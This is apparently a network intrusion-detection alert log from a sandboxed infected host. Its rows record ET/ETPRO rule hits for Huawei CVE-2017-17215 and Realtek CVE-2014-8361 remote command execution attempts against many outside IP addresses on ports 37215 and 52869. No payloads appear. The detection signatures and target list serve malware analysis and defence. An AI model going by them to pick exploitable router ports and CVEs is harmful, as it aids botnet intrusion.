                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.23159.73.26.136
                                      07/20/24-23:02:09.321968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25538052869192.168.2.23221.3.151.48
                                      07/20/24-23:00:57.221910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.23132.70.95.60
                                      07/20/24-23:01:52.380418TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23507652869192.168.2.23109.170.40.38
                                      07/20/24-23:01:08.655109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3434852869192.168.2.2357.92.179.211
                                      07/20/24-23:01:42.399678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614429652869192.168.2.23141.137.71.180
                                      07/20/24-23:01:49.555689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5284852869192.168.2.23134.217.248.188
                                      07/20/24-23:01:47.921416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615561252869192.168.2.23185.104.180.12
                                      07/20/24-23:01:44.510114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4690452869192.168.2.23133.172.125.251
                                      07/20/24-23:01:42.313122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3523052869192.168.2.23134.135.7.1
                                      07/20/24-23:01:56.327422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615767052869192.168.2.2387.244.170.26
                                      07/20/24-23:01:41.217142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3286052869192.168.2.2341.87.239.136
                                      07/20/24-23:02:21.004725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25833652869192.168.2.23102.251.132.142
                                      07/20/24-23:01:52.940746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3687652869192.168.2.23159.143.86.166
                                      07/20/24-23:01:45.544315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3476852869192.168.2.2391.148.233.46
                                      07/20/24-23:01:31.318206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351852869192.168.2.2358.239.1.240
                                      07/20/24-23:00:59.153608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922637215192.168.2.2341.124.14.171
                                      07/20/24-23:01:43.096223TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26032852869192.168.2.23153.113.97.179
                                      07/20/24-23:01:43.957856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906252869192.168.2.2312.82.126.36
                                      07/20/24-23:01:52.482723TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615816252869192.168.2.23184.162.52.201
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177437215192.168.2.23157.138.76.190
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666637215192.168.2.2341.58.91.210
                                      07/20/24-23:01:42.280418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907052869192.168.2.2318.181.232.193
                                      07/20/24-23:01:49.207937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615886052869192.168.2.2368.37.23.19
                                      07/20/24-23:01:48.016319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4161452869192.168.2.23101.157.175.20
                                      07/20/24-23:01:31.975513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297637215192.168.2.23197.162.41.254
                                      07/20/24-23:01:01.793488TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615768252869192.168.2.2313.112.9.246
                                      07/20/24-23:01:08.677485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25427452869192.168.2.2375.16.13.92
                                      07/20/24-23:01:50.418920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614785252869192.168.2.2361.169.73.117
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.2383.201.55.21
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864437215192.168.2.23157.75.39.95
                                      07/20/24-23:01:08.572790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23955252869192.168.2.23129.167.170.254
                                      07/20/24-23:02:04.133788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783052869192.168.2.23166.75.101.81
                                      07/20/24-23:01:04.064240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.23157.38.58.237
                                      07/20/24-23:01:42.908066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615525852869192.168.2.2391.160.10.25
                                      07/20/24-23:01:46.150064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3488052869192.168.2.2342.202.134.116
                                      07/20/24-23:02:00.908220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5622252869192.168.2.23192.173.75.154
                                      07/20/24-23:01:53.064325TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451252869192.168.2.23158.140.216.184
                                      07/20/24-23:01:00.638418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010437215192.168.2.23157.63.197.170
                                      07/20/24-23:01:56.304951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614553052869192.168.2.23104.73.220.78
                                      07/20/24-23:01:47.331200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614680652869192.168.2.23191.68.229.244
                                      07/20/24-23:01:42.527235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25809652869192.168.2.2370.95.192.176
                                      07/20/24-23:01:42.988853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615582852869192.168.2.2350.88.74.31
                                      07/20/24-23:01:26.125703TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613607652869192.168.2.23149.142.97.135
                                      07/20/24-23:01:42.334131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615544052869192.168.2.2387.76.92.180
                                      07/20/24-23:01:56.667752TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23311852869192.168.2.23141.3.146.221
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395837215192.168.2.2341.129.118.181
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073637215192.168.2.2341.183.90.96
                                      07/20/24-23:01:43.023201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3801852869192.168.2.2349.182.174.70
                                      07/20/24-23:02:07.493932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4824652869192.168.2.23140.7.17.21
                                      07/20/24-23:01:45.165718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23326052869192.168.2.23125.137.245.127
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627037215192.168.2.2341.50.145.107
                                      07/20/24-23:01:43.642551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615634852869192.168.2.23114.55.77.0
                                      07/20/24-23:01:43.167781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615246652869192.168.2.23212.16.123.155
                                      07/20/24-23:01:51.060408TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476852869192.168.2.23158.244.111.55
                                      07/20/24-23:01:43.993916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4484452869192.168.2.2347.141.1.52
                                      07/20/24-23:01:52.006905TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23819452869192.168.2.2347.192.243.189
                                      07/20/24-23:01:09.027075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4480652869192.168.2.23157.202.7.129
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433837215192.168.2.23157.215.58.156
                                      07/20/24-23:01:42.660847TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615929252869192.168.2.23161.245.24.12
                                      07/20/24-23:01:43.874054TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26009252869192.168.2.23132.191.84.86
                                      07/20/24-23:01:42.390246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5479452869192.168.2.23111.85.168.68
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656637215192.168.2.23197.108.65.14
                                      07/20/24-23:02:12.234515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5829052869192.168.2.23129.212.42.23
                                      07/20/24-23:01:20.113254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547037215192.168.2.2377.62.120.208
                                      07/20/24-23:01:44.470424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4017252869192.168.2.2363.251.2.20
                                      07/20/24-23:01:26.790100TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613576852869192.168.2.23168.91.139.254
                                      07/20/24-23:01:59.992285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4703252869192.168.2.2393.39.228.144
                                      07/20/24-23:01:04.986393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5714252869192.168.2.2323.225.3.54
                                      07/20/24-23:01:46.387777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26013852869192.168.2.2357.145.129.242
                                      07/20/24-23:01:47.267254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5113652869192.168.2.2393.186.61.171
                                      07/20/24-23:02:48.447183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787452869192.168.2.2378.236.82.99
                                      07/20/24-23:01:42.507489TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24182052869192.168.2.2318.194.44.24
                                      07/20/24-23:01:57.723224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4518852869192.168.2.2314.138.152.232
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998437215192.168.2.23197.57.36.21
                                      07/20/24-23:01:11.631937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570237215192.168.2.23197.37.248.61
                                      07/20/24-23:01:42.891313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613554452869192.168.2.23206.12.145.11
                                      07/20/24-23:00:57.221530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770837215192.168.2.2341.143.175.164
                                      07/20/24-23:01:41.933600TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758452869192.168.2.23174.56.140.249
                                      07/20/24-23:01:51.144153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4733052869192.168.2.23187.4.24.206
                                      07/20/24-23:01:45.660608TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25370252869192.168.2.231.198.183.23
                                      07/20/24-23:01:08.590937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4241252869192.168.2.23209.101.108.92
                                      07/20/24-23:01:56.485717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613634052869192.168.2.23106.180.129.117
                                      07/20/24-23:01:43.998794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25540652869192.168.2.2339.170.42.160
                                      07/20/24-23:01:14.126869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798037215192.168.2.23197.142.66.141
                                      07/20/24-23:01:02.103737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628437215192.168.2.23104.38.28.110
                                      07/20/24-23:01:04.786751TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615589452869192.168.2.2365.136.207.183
                                      07/20/24-23:01:02.081923TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615062652869192.168.2.23161.203.121.55
                                      07/20/24-23:01:44.325103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615744652869192.168.2.23195.45.218.64
                                      07/20/24-23:01:42.677933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4858052869192.168.2.232.228.92.40
                                      07/20/24-23:01:46.305660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5938652869192.168.2.231.111.156.136
                                      07/20/24-23:01:25.540121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085652869192.168.2.23100.45.46.163
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823237215192.168.2.2341.67.206.241
                                      07/20/24-23:01:49.454456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614938652869192.168.2.23203.201.27.61
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912437215192.168.2.23157.154.164.78
                                      07/20/24-23:01:13.983744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4005852869192.168.2.23207.246.209.117
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034637215192.168.2.23197.2.142.127
                                      07/20/24-23:01:26.043735TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4662052869192.168.2.23151.83.163.85
                                      07/20/24-23:01:47.796509TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615258652869192.168.2.23210.209.80.73
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895037215192.168.2.2398.137.112.190
                                      07/20/24-23:01:45.034156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24560852869192.168.2.23157.155.242.14
                                      07/20/24-23:01:46.971627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615601652869192.168.2.2317.24.227.79
                                      07/20/24-23:02:20.068152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3782452869192.168.2.23203.12.208.34
                                      07/20/24-23:01:42.401855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24001252869192.168.2.2353.176.94.191
                                      07/20/24-23:01:27.730585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5271037215192.168.2.2341.253.120.16
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.23157.163.80.204
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957837215192.168.2.23157.83.235.248
                                      07/20/24-23:02:11.752225TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831852869192.168.2.2318.237.154.16
                                      07/20/24-23:01:03.225977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4306052869192.168.2.23223.83.213.222
                                      07/20/24-23:01:42.758699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673452869192.168.2.2396.213.123.243
                                      07/20/24-23:01:57.762774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615783052869192.168.2.23182.21.209.138
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907237215192.168.2.23197.206.59.160
                                      07/20/24-23:00:57.222163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344037215192.168.2.23197.212.61.129
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608037215192.168.2.23223.98.49.191
                                      07/20/24-23:01:09.032669TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25431252869192.168.2.23100.7.167.160
                                      07/20/24-23:01:12.807101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23733252869192.168.2.23207.199.110.98
                                      07/20/24-23:01:07.016889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500237215192.168.2.23157.198.64.39
                                      07/20/24-23:01:40.310207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102037215192.168.2.2341.28.95.234
                                      07/20/24-23:01:43.498156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3841252869192.168.2.23220.111.117.206
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589037215192.168.2.23157.44.241.190
                                      07/20/24-23:01:47.840364TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25436252869192.168.2.23129.40.249.193
                                      07/20/24-23:01:51.864479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788252869192.168.2.23111.225.128.216
                                      07/20/24-23:01:44.795218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544052869192.168.2.2336.130.15.144
                                      07/20/24-23:01:21.938818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794437215192.168.2.23206.153.203.206
                                      07/20/24-23:01:20.110860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843837215192.168.2.2341.111.23.136
                                      07/20/24-23:01:58.755147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4599452869192.168.2.2392.186.116.223
                                      07/20/24-23:01:02.783592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5506652869192.168.2.23162.117.132.232
                                      07/20/24-23:01:32.059767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526837215192.168.2.23209.26.187.120
                                      07/20/24-23:01:58.474391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462652869192.168.2.23184.89.50.234
                                      07/20/24-23:01:13.289823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435852869192.168.2.2385.161.3.79
                                      07/20/24-23:01:41.501891TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615377452869192.168.2.23212.24.31.41
                                      07/20/24-23:01:24.889164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233637215192.168.2.23157.29.185.108
                                      07/20/24-23:01:51.172994TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24444452869192.168.2.2366.150.226.120
                                      07/20/24-23:01:42.641430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615514052869192.168.2.232.108.114.50
                                      07/20/24-23:01:50.065539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23487852869192.168.2.2334.116.171.252
                                      07/20/24-23:01:25.200191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615758452869192.168.2.2336.69.228.71
                                      07/20/24-23:01:04.423031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358452869192.168.2.23186.40.176.32
                                      07/20/24-23:01:44.085493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6051452869192.168.2.23104.158.63.237
                                      07/20/24-23:01:44.991829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25846052869192.168.2.23202.1.176.48
                                      07/20/24-23:01:58.190255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5335852869192.168.2.23199.118.63.112
                                      07/20/24-23:01:58.945733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3361852869192.168.2.2327.10.81.5
                                      07/20/24-23:01:49.070413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3318452869192.168.2.23216.27.105.182
                                      07/20/24-23:01:53.175676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963852869192.168.2.23184.241.110.129
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965237215192.168.2.2341.240.87.211
                                      07/20/24-23:01:51.698859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4324652869192.168.2.2379.129.206.60
                                      07/20/24-23:01:52.569791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198852869192.168.2.232.77.241.40
                                      07/20/24-23:01:40.321965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787437215192.168.2.23197.34.80.193
                                      07/20/24-23:01:57.049485TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614344852869192.168.2.2349.91.98.221
                                      07/20/24-23:01:27.668073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516037215192.168.2.23197.157.98.132
                                      07/20/24-23:01:42.062724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5974052869192.168.2.2386.18.150.91
                                      07/20/24-23:02:08.171169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4456652869192.168.2.2342.89.136.69
                                      07/20/24-23:01:52.599833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4854052869192.168.2.2388.29.130.31
                                      07/20/24-23:01:56.910590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3784052869192.168.2.2386.115.200.136
                                      07/20/24-23:01:51.258596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649252869192.168.2.23122.90.179.148
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830437215192.168.2.23197.92.201.180
                                      07/20/24-23:01:46.125172TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25696852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:02.324877TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615547052869192.168.2.23143.198.233.204
                                      07/20/24-23:01:48.118060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4915452869192.168.2.23162.125.127.147
                                      07/20/24-23:01:57.388537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4425252869192.168.2.2367.104.194.85
                                      07/20/24-23:01:11.636425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054037215192.168.2.2341.44.134.248
                                      07/20/24-23:01:34.048618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915637215192.168.2.2341.183.23.205
                                      07/20/24-23:01:02.045640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.2341.136.199.110
                                      07/20/24-23:01:02.113055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710037215192.168.2.23197.224.4.245
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331837215192.168.2.23197.9.246.73
                                      07/20/24-23:02:00.322736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721652869192.168.2.23216.183.225.201
                                      07/20/24-23:02:00.710832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3554852869192.168.2.2339.235.222.86
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835237215192.168.2.2320.109.185.247
                                      07/20/24-23:01:53.068475TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614550652869192.168.2.2381.196.84.169
                                      07/20/24-23:01:53.472037TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615847252869192.168.2.2382.240.7.131
                                      07/20/24-23:01:42.636583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5527252869192.168.2.23180.183.76.230
                                      07/20/24-23:01:44.325773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614367252869192.168.2.23119.138.76.79
                                      07/20/24-23:02:06.813916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23486452869192.168.2.23185.209.39.214
                                      07/20/24-23:01:01.904524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707837215192.168.2.23197.24.224.193
                                      07/20/24-23:01:31.313383TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25367052869192.168.2.23220.0.122.40
                                      07/20/24-23:01:03.924344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4065052869192.168.2.2324.106.184.126
                                      07/20/24-23:01:47.005094TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24114652869192.168.2.23146.33.84.180
                                      07/20/24-23:01:41.259813TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614031052869192.168.2.23129.151.175.195
